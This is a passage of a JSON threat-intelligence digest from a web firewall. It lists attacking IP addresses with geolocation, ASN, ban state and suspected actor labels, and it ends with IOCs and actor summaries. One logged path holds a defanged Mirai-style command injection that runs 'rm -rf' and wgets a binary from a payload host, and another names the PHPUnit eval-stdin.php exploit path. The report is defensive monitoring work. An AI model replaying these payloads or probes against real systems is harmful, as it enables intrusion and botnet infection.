   "city": "Andorra la Vella",
   "lat": 42.5063,
   "lon": 1.52184,
   "asn": 48090,
   "org": "TECHOFF SRV LIMITED",
   "ptr": null,
   "types": [
    "secret-probe",
    "behaviour"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T21:45:00+02:00",
   "last_seen": "2026-10-06T21:45:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting",
    "cluster:45.148.10.0/24"
   ],
   "paths": [
    "/api/package.json"
   ],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS48090 TECHOFF SRV (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "4 addresses from 45.148.10.0/24 (AS48090) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "45.156.87.131",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Amsterdam",
   "lat": 52.3676,
   "lon": 4.90414,
   "asn": 197170,
   "org": "TechTies Inc.",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-07T01:43:00+02:00",
   "last_seen": "2026-10-07T01:43:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "45.225.135.21",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Amsterdam",
   "lat": 52.3676,
   "lon": 4.90414,
   "asn": 64107,
   "org": "RACK SPHERE HOSTING S.A.",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T22:02:00+02:00",
   "last_seen": "2026-10-06T22:02:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "45.70.164.148",
   "country": "Brazil",
   "cc": "BR",
   "city": "Itagua\u00ed",
   "lat": -22.8522,
   "lon": -43.7753,
   "asn": 267578,
   "org": "WILLIAN MENDES DE OLIVEIRA \u00ad ME",
   "ptr": "45-70-164-148.rede.wlinks.com.br",
   "types": [
    "attack-tool"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-07T04:53:00+02:00",
   "last_seen": "2026-10-07T04:53:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Automated attack tool",
    "confidence": "low",
    "evidence": [
     "request carried a known attack-tool user agent"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "45.78.224.85",
   "country": "Singapore",
   "cc": "SG",
   "city": "Singapore",
   "lat": 1.35208,
   "lon": 103.82,
   "asn": 150436,
   "org": "Byteplus Pte. Ltd.",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T23:05:00+02:00",
   "last_seen": "2026-10-06T23:05:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "62.60.130.117",
   "country": "United Kingdom",
   "cc": "GB",
   "city": "London",
   "lat": 51.5072,
   "lon": -0.127586,
   "asn": 215930,
   "org": "CIPHER OPERATIONS DOO BEOGRAD - NOVI BEOGRAD",
   "ptr": null,
   "types": [
    "cms-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-07T00:18:00+02:00",
   "last_seen": "2026-10-07T00:18:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1"
   ],
   "paths": [],
   "actor": {
    "label": "Known-bad scanning infrastructure",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "64.204.51.37",
   "country": "United States",
   "cc": "US",
   "city": "Ashburn",
   "lat": 39.0438,
   "lon": -77.4874,
   "asn": 219329,
   "org": "ASN-FEIT",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-07T05:18:00+02:00",
   "last_seen": "2026-10-07T05:18:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "64.62.156.222",
   "country": "United States",
   "cc": "US",
   "city": "Pleasanton",
   "lat": 37.6951,
   "lon": -121.9,
   "asn": 6939,
   "org": "Hurricane Electric LLC",
   "ptr": "scan-90-0.shadowserver.io",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-07T02:29:00+02:00",
   "last_seen": "2026-10-07T02:29:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "firehol-level1",
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS scan-90-0.shadowserver.io"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "64.89.161.82",
   "country": "Luxembourg",
   "cc": "LU",
   "city": "Schieren",
   "lat": 49.8153,
   "lon": 6.12958,
   "asn": 36680,
   "org": "Netiface LLC",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 4,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-06T19:46:00+02:00",
   "last_seen": "2026-10-06T19:46:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "65.49.1.182",
   "country": "United States",
   "cc": "US",
   "city": "Pleasanton",
   "lat": 37.6951,
   "lon": -121.9,
   "asn": 6939,
   "org": "Hurricane Electric LLC",
   "ptr": "scan-74-00.shadowserver.io",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-07T05:21:00+02:00",
   "last_seen": "2026-10-07T05:21:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "firehol-level1",
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS scan-74-00.shadowserver.io"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "68.69.177.112",
   "country": "United States",
   "cc": "US",
   "city": "Hollis",
   "lat": 42.7425,
   "lon": -71.5895,
   "asn": 402226,
   "org": "OnlyScans LLC",
   "ptr": "d5f757a6.scanners.onlyscans.net",
   "types": [
    "php-probe"
   ],
   "bans": 1,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-06T18:57:00+02:00",
   "last_seen": "2026-10-06T18:57:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "research-scanner",
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "medium",
    "evidence": [
     "reverse DNS d5f757a6.scanners.onlyscans.net"
    ]
   },
   "seen_nights": [
    "2026-10-03",
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "73.53.43.220",
   "country": "United States",
   "cc": "US",
   "city": "Everett",
   "lat": 47.979,
   "lon": -122.202,
   "asn": 7922,
   "org": "Comcast Cable Communications, LLC",
   "ptr": "c-73-53-43-220.hsd1.wa.comcast.net",
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-07T00:10:00+02:00",
   "last_seen": "2026-10-07T00:10:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [],
   "tags": [
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "8.163.68.110",
   "country": "China",
   "cc": "CN",
   "city": "Guangzhou",
   "lat": 23.1291,
   "lon": 113.264,
   "asn": 37963,
   "org": "Hangzhou Alibaba Advertising Co.,Ltd.",
   "ptr": null,
   "types": [
    "secret-probe",
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T22:24:00+02:00",
   "last_seen": "2026-10-06T22:25:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [
    "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
   ],
   "actor": {
    "label": "Suspected Androxgh0st-style Laravel/PHPUnit exploitation",
    "confidence": "low",
    "evidence": [
     "probes PHPUnit eval-stdin.php (CVE-2017-9841), a technique documented in CISA AA24-016A",
     "no request bodies are logged, so the malware family cannot be confirmed"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "8.231.188.50",
   "country": "United States",
   "cc": "US",
   "city": "The Dalles",
   "lat": 45.6018,
   "lon": -121.185,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "50.188.231.8.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T21:53:00+02:00",
   "last_seen": "2026-10-06T21:53:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "81.171.72.135",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Haarlem (Oude Stad)",
   "lat": 52.3894,
   "lon": 4.63245,
   "asn": 34343,
   "org": "Eweka Internet Services B.V.",
   "ptr": null,
   "types": [
    "credential-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T22:50:00+02:00",
   "last_seen": "2026-10-06T22:50:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "cluster:81.171.72.0/24",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "hunts for .env, VCS or credential files",
     "2 addresses from 81.171.72.0/24 (AS34343) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-03",
    "2026-10-05",
    "2026-10-07"
   ]
  },
  {
   "ip": "81.171.72.93",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Haarlem (Oude Stad)",
   "lat": 52.3894,
   "lon": 4.63245,
   "asn": 34343,
   "org": "Eweka Internet Services B.V.",
   "ptr": null,
   "types": [
    "credential-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T22:50:00+02:00",
   "last_seen": "2026-10-06T22:50:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "cluster:81.171.72.0/24",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "hunts for .env, VCS or credential files",
     "2 addresses from 81.171.72.0/24 (AS34343) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-07"
   ]
  },
  {
   "ip": "83.143.112.7",
   "country": "Finland",
   "cc": "FI",
   "city": "Helsinki",
   "lat": 60.1699,
   "lon": 24.9384,
   "asn": 215439,
   "org": "PLAY2GO INTERNATIONAL LIMITED",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-07T01:10:00+02:00",
   "last_seen": "2026-10-07T01:10:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "91.92.242.37",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Amsterdam",
   "lat": 52.3734,
   "lon": 4.89406,
   "asn": 202412,
   "org": "Omegatech LTD",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-07T00:14:00+02:00",
   "last_seen": "2026-10-07T00:14:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-07"
   ]
  },
  {
   "ip": "91.92.41.115",
   "country": "Bulgaria",
   "cc": "BG",
   "city": "Sofia",
   "lat": 42.6977,
   "lon": 23.3219,
   "asn": 211443,
   "org": "SINO WORLDWIDE TRADING LIMITED",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T18:33:00+02:00",
   "last_seen": "2026-10-06T18:33:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "92.113.211.177",
   "country": "United States",
   "cc": "US",
   "city": "Dallas",
   "lat": 32.7767,
   "lon": -96.797,
   "asn": 219329,
   "org": "ASN-FEIT",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-07T05:56:00+02:00",
   "last_seen": "2026-10-07T05:56:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "cluster:92.113.211.0/24"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "hunts for .env, VCS or credential files",
     "2 addresses from 92.113.211.0/24 (AS219329) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "92.113.211.53",
   "country": "United States",
   "cc": "US",
   "city": "Dallas",
   "lat": 32.7767,
   "lon": -96.797,
   "asn": 219329,
   "org": "ASN-FEIT",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-07T05:30:00+02:00",
   "last_seen": "2026-10-07T05:30:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "cluster:92.113.211.0/24"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "hunts for .env, VCS or credential files",
     "2 addresses from 92.113.211.0/24 (AS219329) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "93.152.221.85",
   "country": "Germany",
   "cc": "DE",
   "city": "Frankfurt am Main",
   "lat": 50.1109,
   "lon": 8.68213,
   "asn": 197170,
   "org": "TechTies Inc.",
   "ptr": null,
   "types": [
    "command-injection"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T20:14:00+02:00",
   "last_seen": "2026-10-06T20:14:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1"
   ],
   "paths": [
    "/shell?cd+/var/dev;rm+-rf+*;wget+http[:]//176.65.139.139/bins/xnxnxnxnxnxnxnxnx86_64xnxn+-O+\u2026"
   ],
   "actor": {
    "label": "Suspected Mirai-style IoT botnet",
    "confidence": "medium",
    "evidence": [
     "IoT/router exploit path with a downloader typical of Mirai-family loaders",
     "payload fetches an architecture-named binary from /bins/"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "94.154.43.125",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Amsterdam",
   "lat": 52.3734,
   "lon": 4.89406,
   "asn": 219502,
   "org": "Storm Industries LLC",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 4,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-07T00:33:00+02:00",
   "last_seen": "2026-10-07T00:33:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting",
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS219502 Storm Industries (abuse-prone hosting)",
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-07"
   ]
  },
  {
   "ip": "157.230.20.243",
   "country": "Germany",
   "cc": "DE",
   "city": "Frankfurt am Main",
   "lat": 50.1109,
   "lon": 8.68213,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": null,
   "types": [
    "cms-probe"
   ],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": null,
   "first_seen": "2026-10-06T18:49:00+02:00",
   "last_seen": "2026-10-06T18:49:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [
    "/HNAP1"
   ],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "186.248.73.98",
   "country": "Brazil",
   "cc": "BR",
   "city": "Formiga",
   "lat": -20.4644,
   "lon": -45.4264,
   "asn": 23106,
   "org": "AMERICAN TOWER DO BRASIL-COMUNICA\u00c7\u00c2O MULTIM\u00cdDIA LT",
   "ptr": "ns1.uniformg.edu.br",
   "types": [
    "attack-tool",
    "php-probe"
   ],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": null,
   "first_seen": "2026-10-06T18:31:00+02:00",
   "last_seen": "2026-10-06T18:48:00+02:00",
   "sensors": [
    "web-1",
    "web-2",
    "web-3"
   ],
   "notes": [],
   "tags": [],
   "paths": [
    "/",
    "/admin/config.php"
   ],
   "actor": {
    "label": "Automated attack tool",
    "confidence": "low",
    "evidence": [
     "request carried a known attack-tool user agent"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "40.124.116.159",
   "country": "United States",
   "cc": "US",
   "city": "San Antonio",
   "lat": 29.4252,
   "lon": -98.4946,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "attack-tool"
   ],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": null,
   "first_seen": "2026-10-06T18:48:00+02:00",
   "last_seen": "2026-10-06T18:48:00+02:00",
   "sensors": [
    "web-1"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [
    "/mcp"
   ],
   "actor": {
    "label": "Automated attack tool",
    "confidence": "low",
    "evidence": [
     "request carried a known attack-tool user agent"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "40.67.173.117",
   "country": "United States",
   "cc": "US",
   "city": "Des Moines",
   "lat": 41.5868,
   "lon": -93.625,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "attack-tool"
   ],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": null,
   "first_seen": "2026-10-06T20:39:00+02:00",
   "last_seen": "2026-10-06T20:39:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [
    "/manager/html"
   ],
   "actor": {
    "label": "Automated attack tool",
    "confidence": "low",
    "evidence": [
     "request carried a known attack-tool user agent"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  }
 ],
 "iocs": [
  {
   "indicator": "176.65.139.139",
   "port": null,
   "kind": "payload-download-host",
   "context": "Shell command injection payload fetches /bins/xnxnxnxnxnxnxnxnx86_64xnxn",
   "seen_from": "93.152.221.85"
  },
  {
   "indicator": "158.255.83.176",
   "port": null,
   "kind": "payload-download-host",
   "context": "Shell command injection payload fetches /",
   "seen_from": "158.255.83.176"
  }
 ],
 "actors": [
  {
   "label": "Suspected credential/secret-harvesting campaign",
   "confidence": "medium",
   "addresses": 38,
   "ips": [
    "195.178.110.15",
    "195.178.110.199",
    "45.138.12.24",
    "45.138.12.10",
    "93.123.109.101",
    "160.176.73.178",
    "193.32.162.156",
    "193.32.162.175",
    "172.86.86.158",
    "193.32.162.164",
    "34.23.170.28",
    "45.138.12.188",
    "64.247.196.151",
    "104.244.74.39",
    "111.90.180.172",
    "136.109.107.235",
    "216.126.237.47",
    "216.81.248.89",
    "34.133.94.182",
    "34.53.119.204",
    "34.73.22.186",
    "35.201.196.175",
    "45.138.12.6",
    "45.148.10.120",
    "45.148.10.14",
    "45.148.10.171",
    "45.148.10.74",
    "45.156.87.131",
    "64.204.51.37",
    "64.89.161.82",
    "8.231.188.50",
    "81.171.72.135",
    "81.171.72.93",
    "91.92.242.37",
    "91.92.41.115",
    "92.113.211.177",
    "92.113.211.53",
    "94.154.43.125"
   ],
   "top_countries": {
    "US": 13,
    "NL": 8,
    "AD": 7,
    "HK": 4,
    "LU": 2
   },
   "types": {
    "secret-probe": 34,
    "credential-probe": 7,
    "behaviour": 1
   },
   "evidence": [
    "hunts for .env, VCS or credential files",
    "listed on Spamhaus DROP",
    "listed on FireHOL level 1",
    "AS48090 TECHOFF SRV (abuse-prone hosting)",
    "AS218785 TC DATACENTER (abuse-prone hosting)",
    "4 addresses from 45.138.12.0/24 (AS218785) attacked the same night"
   ]
  },
  {
   "label": "Suspected exploit/RCE bot",
   "confidence": "medium",
   "addresses": 17,
   "ips": [
    "62.146.226.80",
    "45.238.235.2",
    "102.244.97.185",
    "169.58.214.236",
    "47.95.234.23",
    "103.46.186.148",
    "103.46.186.85",
    "118.145.104.105",
    "124.158.13.141",
    "187.87.144.234",
    "2.28.13.214",
    "221.159.119.6",
    "41.38.160.135",
    "45.225.135.21",
    "45.78.224.85",
    "73.53.43.220",
    "83.143.112.7"
   ],
   "top_countries": {
    "US": 2,
    "BR": 2,
    "DE": 2,
    "CN": 2,
    "ID": 2
   },
   "types": {
    "rce-payload": 15,
    "command-injection": 2
   },
   "evidence": [
    "sent a shell or PHP payload",
    "2 addresses from 103.46.186.0/24 (AS150462) attacked the same night"
   ]
  },
  {
   "label": "Internet research scanner (benign)",
   "confidence": "high",
   "addresses": 12,
   "ips": [
    "3.129.187.38",
    "18.218.118.203",
    "66.132.195.109",
    "142.93.0.66",
    "184.105.247.194",
    "199.165.159.33",
    "199.165.159.65",
    "209.38.248.17",
    "216.218.206.68",
    "64.62.156.222",
    "65.49.1.182",
    "68.69.177.112"
   ],
   "top_countries": {
    "US": 11,
    "DE": 1
   },
   "types": {
    "secret-probe": 8,
    "php-probe": 1
   },
   "evidence": [
    "reverse DNS scan.visionheight.com",
    "ASN organisation matches 'shadowserver'",
    "ASN organisation matches 'censys'",
    "reverse DNS b1cb777a43.scan.leakix.org",
    "reverse DNS scan-13.shadowserver.io",
    "reverse DNS c1fe727412.scan.leakix.org"
   ]
  },
  {
   "label": "Suspected CMS exploitation bot",
   "confidence": "low",
   "addresses": 9,
   "ips": [
    "20.214.170.255",
    "169.40.142.224",
    "159.223.66.123",
    "82.102.18.222",
    "143.244.57.90",
    "158.23.176.177",
    "165.22.59.27",
    "20.214.145.90",
    "157.230.20.243"
   ],
   "top_countries": {
    "FR": 3,
    "KR": 2,
    "SG": 2,
    "MX": 1,
    "DE": 1
   },
   "types": {
    "cms-probe": 5,
    "php-probe": 4
   },
   "evidence": [
    "CMS, admin panel or PHP script probing"
   ]
  },
  {
   "label": "Automated attack tool",
   "confidence": "low",
   "addresses": 9,
   "ips": [
    "177.8.71.123",
    "138.122.21.19",
    "187.108.1.142",
    "190.111.110.13",
    "200.219.11.15",
    "45.70.164.148",
    "186.248.73.98",
    "40.124.116.159",
    "40.67.173.117"
   ],
   "top_countries": {
    "BR": 7,
    "US": 2
   },
   "types": {
    "attack-tool": 9,
    "php-probe": 2
   },
   "evidence": [
    "request carried a known attack-tool user agent"
   ]
  },
  {
   "label": "Suspected Mirai-style IoT botnet",
   "confidence": "medium",
   "addresses": 4,
   "ips": [
    "223.123.65.54",
    "103.216.170.129",
    "158.255.83.176",
    "93.152.221.85"
   ],
   "top_countries": {
    "PK": 1,
    "IN": 1,
    "RU": 1,
    "DE": 1
   },
   "types": {
    "rce-payload": 2,
    "command-injection": 2
   },
   "evidence": [
    "IoT/router exploit path with a downloader typical of Mirai-family loaders",
    "payload fetches an architecture-named binary from /bins/"
   ]
  },
  {
   "label": "CDN edge relaying an attack (true origin hidden)",
   "confidence": "high",
   "addresses": 3,
   "ips": [
    "172.68.151.42",
    "172.69.223.156",
    "172.71.119.90"
   ],
   "top_countries": {
    "FR": 3
   },
   "types": {
    "secret-probe": 3
   },
   "evidence": [
    "AS13335 Cloudflare is a CDN; the real client is behind it"
   ]
  },
  {
   "label": "Known-bad scanning infrastructure",
   "confidence": "medium",
   "addresses": 1,
   "ips": [
    "62.60.130.117"
   ],
   "top_countries": {
    "GB": 1
   },
   "types": {
    "cms-probe": 1
   },
   "evidence": [
    "listed on Spamhaus DROP",
    "listed on FireHOL level 1"
   ]
  },
  {
   "label": "Suspected Androxgh0st-style Laravel/PHPUnit exploitation",
   "confidence": "low",
   "addresses": 1,
   "ips": [
    "8.163.68.110"
   ],
   "top_countries": {
    "CN": 1
   },
   "types": {
    "secret-probe": 1,
    "rce-payload": 1
   },
   "evidence": [
    "probes PHPUnit eval-stdin.php (CVE-2017-9841), a technique documented in CISA AA24-016A",
    "no request bodies are logged, so the malware family cannot be confirmed"
   ]
  }
 ],
 "banned_identifiers": {
  "ip_addresses": 85,
  "ban_actions": 103,
  "email_addresses": 0,
  "other": 0,
  "note": "The WAF bans network addresses only; no e-mail or account identifiers appear in the source."
 }
}